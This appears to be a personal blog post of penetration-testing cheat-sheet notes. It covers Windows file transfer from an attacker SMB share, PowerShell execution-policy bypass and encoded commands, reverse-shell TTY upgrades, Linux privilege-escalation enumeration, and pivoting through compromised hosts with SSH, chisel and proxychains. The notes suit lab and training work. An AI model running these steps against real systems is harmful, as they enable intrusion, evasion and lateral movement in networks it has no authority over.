New blog post!

Why? I’ve somehow managed to break my bparrot install on an old laptop…

There are 3 files that I want to keep, so for now they’ll live here :)


File 1 - Windows notes

RDP from Linux

xfreerdp /v:$vip /u:$user /p:$pass /cert:ignore /dynamic-resolution +clipboard

Transfer over SMB

On Linux (Impacket's smbserver.py, serving the current directory as a share called "share")

sudo -E ~/.local/bin/smbserver.py share $(pwd) -smb2support

On Windows

copy \\10.10.16.11\share\work.exe .

Recent Windows builds refuse unauthenticated guest access to SMB shares. If the copy fails with an access error, start the server with -username <USER> -password <PASS> added, and on Windows map the share first with net use \\10.10.16.11\share /user:<USER> <PASS> before copying.

POWERSHELL Policy Stuff

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

Or, without touching the policy at all, read the script into a string and evaluate it

Get-Content -Raw <FILE> | iex

or

powershell -EncodedCommand <Base64encodedcommands>

The Base64 has to be of the command as UTF-16LE text, not UTF-8: feeding the plain string through base64 on Linux gives an argument PowerShell cannot parse.
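Building that argument on the Linux side is a two-line job once you know the encoding rule. The helpers below are an added example, not part of the original notes: ps_encode produces the -EncodedCommand argument, ps_decode reverses it (useful when -EncodedCommand turns up in process-creation logs rather than on your own box), and the names are my own. They assume iconv is present, with an ASCII-only fallback where it is not.

```shell
#!/bin/sh
# Added example, not part of the original notes: produce (and read back) the
# argument for powershell -EncodedCommand from a Linux box. PowerShell decodes
# the Base64 as UTF-16LE text, so `echo cmd | base64` (UTF-8) yields an
# argument it refuses to run.

# Fallback for boxes without iconv. Correct for ASCII-only commands, where
# UTF-16LE is simply every byte followed by a NUL byte.
ps_encode_ascii() {
    printf '%s' "$1" | fold -w1 | while IFS= read -r c || [ -n "$c" ]; do
        printf '%s\000' "$c"
    done | base64 | tr -d '\n'
}

# ps_encode COMMAND -> Base64(UTF-16LE(COMMAND)), no trailing newline.
ps_encode() {
    if command -v iconv >/dev/null 2>&1; then
        printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n'
    else
        ps_encode_ascii "$1"
    fi
}

# ps_decode BASE64 -> the original command text.
ps_decode() {
    if command -v iconv >/dev/null 2>&1; then
        printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
    else
        printf '%s' "$1" | base64 -d | tr -d '\000'   # ASCII-only fallback
    fi
}

# Usage: ps_encode 'whoami' prints dwBoAG8AYQBtAGkA, which runs as
#   powershell -EncodedCommand dwBoAG8AYQBtAGkA
# and ps_decode dwBoAG8AYQBtAGkA prints whoami again.
```

Single-line commands are what -EncodedCommand is normally used for; the ASCII fallback drops embedded newlines, so use the iconv path for multi-line scripts.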

File 2 - Low-Hanging Privilege Escalation on Linux

Try to Spawn a TTY

python -c 'import pty; pty.spawn("/bin/sh")' || python3 -c 'import pty; pty.spawn("/bin/sh")' || /usr/bin/script -qc /bin/sh /dev/null

Then press CTRL+Z to suspend the reverse shell and drop back to your local shell

Get the size of your local terminal using

stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

Which should output something like

rows 30
columns 116

(stty size prints the same two numbers as "30 116" if you prefer.)

Return to the reverse shell using

stty raw -echo; fg

In the reverse shell set the same size using

stty rows <ROWS> cols <COLUMNS>

So in this example

stty rows 30 cols 116

Then set the terminal type using

export TERM=xterm-256color

Tiny privesc check (in a shell without a TTY use sudo -n -l at the end so it fails instead of hanging on a password prompt)

echo "--ID--";id;echo "--ENV--";env;echo "--SUID--";find / -perm -u=s -type f 2>/dev/null; echo "--CAPABILITIES--"; getcap -r / 2>/dev/null; echo "--EXPORTS--"; cat /etc/exports 2>/dev/null;echo "--CRONTAB--"; cat /etc/crontab 2>/dev/null;echo "--APP ARMOR ENTRIES--";ls /etc/apparmor.d/ 2>/dev/null; echo "--SUDO--"; sudo -l
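The SUID list is the noisiest part of that output. What actually matters is the binaries a stock install never ships SUID, and stock SUID names living outside the system directories (a SUID copy of passwd in /tmp is something somebody planted). The filter below is an added example, not part of the original notes; the baseline list is an assumed Debian/Ubuntu set and the function and sample paths are my own.

```shell
#!/bin/sh
# Added example, not part of the original notes: cut the SUID list from the
# one-liner above down to what deserves a look. SUID_BASELINE is an assumed
# Debian/Ubuntu set of binaries that are SUID by design; extend it for the
# target you are on.

SUID_BASELINE="passwd sudo su mount umount chsh chfn gpasswd newgrp pkexec \
fusermount fusermount3 ssh-keysign dbus-daemon-launch-helper \
polkit-agent-helper-1 Xorg.wrap at"

# filter_suid: reads one path per line on stdin and prints
#   new <path>        basename is not in SUID_BASELINE
#   relocated <path>  baseline name sitting outside the system directories
# and nothing at all for baseline binaries where they belong.
filter_suid() {
    while IFS= read -r p || [ -n "$p" ]; do
        name=${p##*/}
        dir=${p%/*}
        case " $SUID_BASELINE " in
            *" $name "*)
                case $dir in
                    /bin|/sbin|/usr/bin|/usr/sbin|/usr/lib|/usr/lib/*|/usr/libexec|/usr/libexec/*) ;;
                    *) printf 'relocated %s\n' "$p" ;;
                esac ;;
            *) printf 'new %s\n' "$p" ;;
        esac
    done
}

# Constructed sample of what `find / -perm -u=s -type f` might return.
sample_suid() {
    printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/find \
        /usr/lib/openssh/ssh-keysign /tmp/passwd /opt/backup/bkp
}

# On the target:  find / -perm -u=s -type f 2>/dev/null | filter_suid
# On the sample this prints:
#   new /usr/bin/find
#   relocated /tmp/passwd
#   new /opt/backup/bkp
sample_suid | filter_suid
```

A "new" hit is the thing to look up (find, vim, python and friends with the SUID bit are classic one-step roots); a "relocated" hit is more likely evidence of an earlier intruder than a misconfiguration.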

File 3 - Simple pivoting commands

Portforwarding

SSH

ssh -Nf -L <local_ip>:<local_port>:<destination_ip>:<remote_port> <user>@<IP>

For example, to get access to a MySQL database on 10.20.30.40 that only listens on localhost

ssh -Nf -L 127.0.0.1:3306:127.0.0.1:3306 victim@10.20.30.40

So any time you try to access your localhost on port 3306 it will instead go through the SSH tunnel to the SSH host’s localhost on port 3306.

The first 127.0.0.1 is the local bind address and can be dropped: ssh binds the listener to your loopback interface by default. So you could shorten it to this

ssh -Nf -L 3306:127.0.0.1:3306 victim@10.20.30.40

You also don't need to use the same local port as the remote port, so you could use port 33306 instead.

ssh -Nf -L 33306:127.0.0.1:3306 victim@10.20.30.40

So now any traffic sent over 127.0.0.1:33306 will go through the SSH tunnel to 127.0.0.1:3306

The destination doesn't need to be 127.0.0.1 either: it can be any host the SSH server can reach. So to access a resource on an internal network, like an HTTP server with the IP 192.168.20.1, you can use this.

ssh -Nf -L 8000:192.168.20.1:80 victim@10.20.30.40

So any traffic sent to 127.0.0.1:8000 goes through the SSH tunnel and out to 192.168.20.1:80

Chisel

Set up a chisel server on your host using

chisel server --port <PORT> --reverse

With --reverse any client that can reach that port may open listeners on your box, so on anything but a lab network add --auth <USER>:<PASS> to the server and the same --auth to the client.

Then on the compromised server

chisel client <ATTACKER_IP>:<ATTACKER_PROXY_PORT> R:<LISTENING_IP>:<LISTEN_PORT>:<SEND_IP>:<SEND_PORT>

An example: to reach RDP bound to 127.0.0.1:3389 on the compromised host (10.20.30.40), run

Linux host (10.10.10.10)

chisel server --port 1234 --reverse

Compromised host

chisel client 10.10.10.10:1234 R:127.0.0.1:4242:127.0.0.1:3389

Now any traffic sent on the Linux host to 127.0.0.1:4242 goes through chisel to the compromised host’s 127.0.0.1:3389

Proxying

SSH

ssh -D <proxy_port> -Nf <user>@<victim_ip>

For example, to set up a SOCKS proxy on 127.0.0.1:6666 that sends everything out through 10.20.30.40

ssh -D 6666 -Nf victim@10.20.30.40

Chisel

Set up a chisel server on your host using

chisel server --port <PORT> --reverse --socks5

Then on the compromised server

chisel client <ATTACKER_IP>:<ATTACKER_PROXY_PORT> R:<PROXY_PORT>:socks

An example to set up a proxy on port 7676.

Your host (10.10.10.10)

chisel server --port 1234 --reverse --socks5

Compromised host

chisel client 10.10.10.10:1234 R:7676:socks

The SOCKS listener ends up on your host at 127.0.0.1:7676; connections made through it leave from the compromised host.

Using the proxy

Now that we’ve got a SOCKS proxy setup, (let’s just say that it’s on port 8080) how do we use it?

Proxychains

"ProxyChains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL and redirects the connections through SOCKS4a/5 or HTTP proxies." (quoted from the proxychains-ng README)

Basically it uses LD_PRELOAD to hook libc's connect and friends and forces every TCP connection the program makes to go through the proxy. That also tells you what it can't do: statically linked binaries (most Go tools, chisel included) never call the hooked libc functions, raw-socket traffic like nmap's default SYN scan and ICMP ping is not a libc connect() at all, and UDP is not proxied. So with nmap use -sT -Pn, and expect scans to be slow.

Usage is pretty easy, albeit slow sometimes…

What I tend to do is copy /etc/proxychains.conf to the current working directory and edit the last line, under [ProxyList], to this syntax.

socks5 127.0.0.1 <PROXY_PORT>

So in this example.

socks5 127.0.0.1 8080

Then to use it, just run

proxychains -f ./proxychains.conf <COMMAND>

With proxychains-ng (the proxychains4 binary on most distros) you could also set the PROXYCHAINS_SOCKS5 environment variable to the port of a SOCKS5 proxy on 127.0.0.1 instead of messing with the config file.

PROXYCHAINS_SOCKS5=<PROXY_PORT> proxychains <COMMAND>
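When a tool "just hangs" through the proxy it helps to know what proxychains is actually sending, and to be able to ask the proxy port directly whether anything is listening. The helpers below are an added example, not part of the original notes: socks5_connect_hex builds the SOCKS5 CONNECT request (RFC 1928) for a host name, which is the form proxychains uses when proxy_dns is on, and socks5_alive sends the protocol greeting to a port and checks for the "no authentication" reply. The function names and the sample hosts are my own; socks5_alive relies on bash's /dev/tcp and so only works under bash.

```shell
#!/bin/bash
# Added example, not part of the original notes: speak SOCKS5 (RFC 1928) by
# hand to a pivot proxy, to confirm it is up and to see what proxychains
# sends on a program's behalf.

# socks5_connect_hex HOST PORT -> hex of the CONNECT request for HOST:PORT:
#   VER=05 CMD=01(CONNECT) RSV=00 ATYP=03(domain name) LEN NAME PORT(big-endian)
# ATYP=03 is what proxychains emits with proxy_dns enabled: the name is
# resolved by the proxy on the far side of the tunnel, so lookups for
# internal names never leave your box unproxied.
socks5_connect_hex() {
    local host=$1 port=$2 name_hex
    name_hex=$(printf '%s' "$host" | od -An -v -tx1 | tr -d ' \n')
    printf '05010003%02x%s%02x%02x\n' "${#host}" "$name_hex" \
        $((port >> 8)) $((port & 255))
}

# socks5_alive HOST PORT -> exit 0 if a SOCKS5 server answers the greeting
# "05 01 00" (version 5, one method offered: no authentication) with "05 00"
# (no authentication selected). Uses bash's /dev/tcp, so no netcat needed,
# but it will block if something accepts the connection and never replies.
socks5_alive() {
    local reply
    reply=$( { printf '\005\001\000' >&3; head -c 2 <&3; } 2>/dev/null 3<>"/dev/tcp/$1/$2" \
             | od -An -v -tx1 | tr -d ' \n')
    [ "$reply" = "0500" ]
}

# Usage once the ssh -D or chisel listener from above is on 127.0.0.1:8080:
#   socks5_alive 127.0.0.1 8080 && echo "SOCKS5 answers" || echo "nothing on 8080"
#   socks5_connect_hex intranet.corp 80
#   -> 05010003 0d 696e7472616e65742e636f7270 0050 (spaces added for reading)
```

If socks5_alive reports nothing but the port is open, the listener is probably SOCKS4 (chisel and ssh -D both speak SOCKS5, so that usually means you are pointed at the wrong port) or an HTTP proxy, and the socks5 line in proxychains.conf is the wrong type for it.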
